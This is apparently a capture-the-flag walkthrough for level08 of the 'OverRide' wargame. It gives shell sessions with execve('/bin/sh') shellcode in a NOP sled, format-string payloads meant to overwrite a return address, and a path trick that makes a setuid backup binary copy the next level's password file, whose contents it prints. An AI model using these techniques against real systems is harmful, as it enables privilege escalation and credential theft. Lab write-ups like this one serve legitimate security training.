gbrochar
/
OverRide
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
OverRide/level08/walkthrough

45 lines
2.4 KiB
Plaintext
Raw Blame History

load shellcode in env with nop slide
level08@OverRide:~$ echo -e "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" > shellcode.bin
level08@OverRide:~$ export SHELLCODE=$(cat shellcode.bin)
level08@OverRide:~$
(gdb) p (char *)getenv("SHELLCODE")
$1 = 0xffffffffffffe892 <Address 0xffffffffffffe892 out of bounds>
need to override ret pointer with 0xffffffffffffe892. For this we are going to write e892, then ffff 3 times. Kinda like level05. we will override log_wrapper ret addr cause its fastest.
Better version (file doesn't need to exist as log_wrapper is called before fopen)
level08@OverRide:~$ env -i SHELLCODE=$(cat shellcode.bin) /home/users/level08/level08 $(python -c "print('AAAABBXXXXCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK'+'%11\$9x'*20)")
ERROR: Failed to open AAAABBXXXXCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x
level08@OverRide:~$ cat backups/.log
LOG: Starting back up: AAAABBXXXXCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858
level08@OverRide:~$
with env -i :
Breakpoint 1, 0x0000000000400a5a in main ()
(gdb) p (char *)getenv("SHELLCODE")
$1 = 0xffffffffffffef79 <Address 0xffffffffffffef79 out of bounds>
env -i SHELLCODE=$(cat shellcode.bin) /home/users/level08/level08 $(python -c "print('AAAABB\xc8\xeb\xff\xff\xff\x7f\x00\x00DDEEEEFFFFGGGGHHHHIIIIJJJJKKKK'+'%17lx'*10+'%n')")
actually its way simpler T_T :
level08@OverRide:~$ mkdir -p /tmp/backups/home/users/level09/
level08@OverRide:~$ cd /tmp
level08@OverRide:/tmp$ ~/level08 /home/users/level09/pass
ERROR: Failed to open /home/users/level09/pass
level08@OverRide:/tmp$ ~/level08 /home/users/level09/.pass
level08@OverRide:/tmp$ cat backups/
home/ .log
level08@OverRide:/tmp$ cat backups/home/users/level09/.pass
fjAwpJNs2vvkFLRebEvAQ2hFZ4uQBWfHRsP62d8S
level08@OverRide:/tmp$ exit
logout
Connection to localhost closed.
Reference in New Issue View Git Blame Copy Permalink